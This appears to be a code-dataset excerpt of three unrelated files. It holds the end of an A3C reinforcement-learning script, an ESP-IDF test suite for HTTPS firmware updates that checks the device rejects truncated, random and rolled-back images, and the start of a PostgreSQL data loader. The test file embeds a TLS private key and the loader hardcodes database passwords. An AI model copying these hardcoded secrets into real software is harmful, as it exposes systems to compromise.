return a_prob, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
prob_weights = SESS.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]),
p=prob_weights.ravel()) # select action w.r.t the actions prob
return action
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
while True:
# if self.name == 'W_0':
# self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if done: r = -5
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.99 * GLOBAL_RUNNING_R[-1] + 0.01 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
example_test.py
|
import http.server
import os
import random
import re
import socket
import ssl
import struct
import subprocess
from threading import Thread
import ttfw_idf
from RangeHTTPServer import RangeRequestHandler
from tiny_test_fw import DUT, Utility
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n'\
'BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n'\
'aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n'\
'MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n'\
'ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n'\
'CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n'\
'nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n'\
'9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n'\
'w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n'\
'3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n'\
'lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n'\
'IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n'\
'DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n'\
'/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n'\
'lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n'\
'6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n'\
'fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n'\
'y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n'\
'hA==\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n'\
'uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n'\
'iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n'\
'ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n'\
'BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n'\
'1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n'\
'Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n'\
'02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n'\
'4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n'\
'SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n'\
'cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n'\
'8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n'\
'MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n'\
'6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n'\
'CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n'\
'ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n'\
'0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n'\
'5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n'\
'zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n'\
'V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n'\
'RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n'\
'nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n'\
'GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n'\
'9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n'\
'qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n'\
'muhfskWf4MABV0yTUaKcGg==\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(RangeRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
RangeRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
print('Sending resp, URL: ' + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
server_file, key_file = get_ca_cert(ota_image_dir)
redirectHandler = redirect_handler_factory('https://' + server_ip + ':' + str(redirection_port) + '/advanced_https_ota.bin')
httpd = http.server.HTTPServer((server_ip, server_port), redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('Image validation failed, image is corrupted', timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('advanced_https_ota_example: esp_https_ota_read_img_desc failed', timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = 'random.bin'
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=10)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
This is a positive test case, which starts a server and a redirection server.
Redirection server redirects http_request to different port
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Port to which the request should be redirecetd
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = Thread(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
thread2.close()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_8Mflash_Ethernet')
def test_examples_protocol_advanced_https_ota_example_anti_rollback(env, extra_data):
"""
Working of OTA when anti_rollback is enabled and security version of new image is less than current one.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with lower security version
3. Fetch OTA image over HTTPS
4. Check working of anti_rollback feature
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='anti_rollback')
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Modified firmware image to lower security version in its header. This is to enable negative test case
anti_rollback_bin_name = 'advanced_https_ota_lower_sec_version.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
file_size = os.path.getsize(binary_file)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, anti_rollback_bin_name), 'wb+')
fo.write(f.read(file_size))
# Change security_version to 0 for negative test case
fo.seek(36)
fo.write(b'\x00')
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, anti_rollback_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
# Positive Case
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use originally generated image with secure_version=1
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
dut1.expect('App is valid, rollback cancelled successfully', 30)
# Negative Case
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use modified image with secure_version=0
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name)
dut1.expect('New firmware security version is less than eFuse programmed, 0 < 1', timeout=30)
os.remove(anti_rollback_bin_name)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_partial_request(env, extra_data):
"""
This is a positive test case, to test OTA workflow with Range HTTP header.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='partial_download')
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
http_requests = int((bin_size / 50000) + 1)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
Utility.console_log('ENV_TEST_FAILURE: Cannot connect to AP')
raise
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
for _ in range(http_requests):
dut1.expect('Connection closed', timeout=60)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
test_examples_protocol_advanced_https_ota_example_anti_rollback()
test_examples_protocol_advanced_https_ota_example_partial_request()
|
test_load.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 2 21:20:40 2019
@author: GaurangPrasadML
"""
import psycopg2
from sqlalchemy import create_engine
import pandas as pd
import threading;
import pymongo;
import json;
conn = psycopg2.connect("host=localhost dbname=test5 user=test5 password=test5")
print("Connected to PSQL")
# print(df.columns)
def loadFoodServices():
df = pd.read_csv("./testingcsv.csv")
cur = conn.cursor()
engine = create_engine('postgresql+psycopg2://test5:test5@localhost/test5')
# Food Service Violations
print("Loading Food Service Violations")
df1 = df[['VIOLATION ITEM', 'VIOLATION DESCRIPTION']]
df_distinct = df1.drop_duplicates(keep="first", inplace=False)
df_distinct.dropna()
df_distinct.columns = ['violation_item', 'violation_description']
df_distinct.to_sql('food_service_violations', engine, schema='public',index=False, if_exists='append')
# Health Dept County Map
print("Loading Health Dept to County Map")
healthMap = df[['COUNTY', 'LOCAL HEALTH DEPARTMENT']]
healthMap = healthMap.drop_duplicates(keep="first", inplace=False)
healthMap.dropna()
healthMap.columns = ['county', 'local_health_department']
healthMap.to_sql('health_dept_county_map', engine, schema='public',index=False, if_exists='append')
# Food Service Operators
print("Loading Food Service Operators")
df3 = df[['NYS HEALTH OPERATION ID', 'OPERATION NAME', 'LATITUDE', 'LONGITUDE', 'FACILITY CODE', 'FACILITY ADDRESS', 'FACILITY MUNICIPALITY',
'FACILITY CITY', 'FACILITY POSTAL ZIPCODE', 'FS FACILITY STATE', 'PERMITTED DBA', 'PERMITTED CORP. NAME', 'PERM. OPERATOR LAST NAME',
'PERM. OPERATOR FIRST NAME', 'FOOD SERVICE TYPE', 'FOOD SERVICE DESCRIPTION', 'PERMIT EXPIRATION DATE']]
df3_distinct = df3.drop_duplicates(subset='NYS HEALTH OPERATION ID', keep="first", inplace=False)
df3_distinct.columns = ['nys_health_operation_id', 'operation_name','latitude','longitude',
'facility_code','facility_address','facility_municipality','facility_city','facility_postal_zipcode',
'fs_facility_state','permitted_dba','permitted_corp_name','perm_operator_last_name','perm_operator_first_name',
'food_service_type','food_service_description','permit_expiration_date']
df3_distinct.to_sql('food_service_operator', engine,schema='public',index=False, if_exists='append')
# Food Service Inspections
print("Loading Food Service Inspections")
df4 = df[['COUNTY','DATE OF INSPECTION','NYS HEALTH OPERATION ID','VIOLATION ITEM',
'CRITICAL VIOLATION','TOTAL # CRITICAL VIOLATIONS','TOTAL #CRIT. NOT CORRECTED',
'TOTAL # NONCRITICAL VIOLATIONS', 'NYSDOH GAZETTEER 1980', 'INSPECTION TYPE',
'INSPECTION COMMENTS']]
df4 = df4.dropna(how='any',axis=0)
df4.columns = ['county','date_of_inspection','nys_health_operation_id',
'violation_item','critical_violation','total_critical_violations','total_crit_not_corrected',
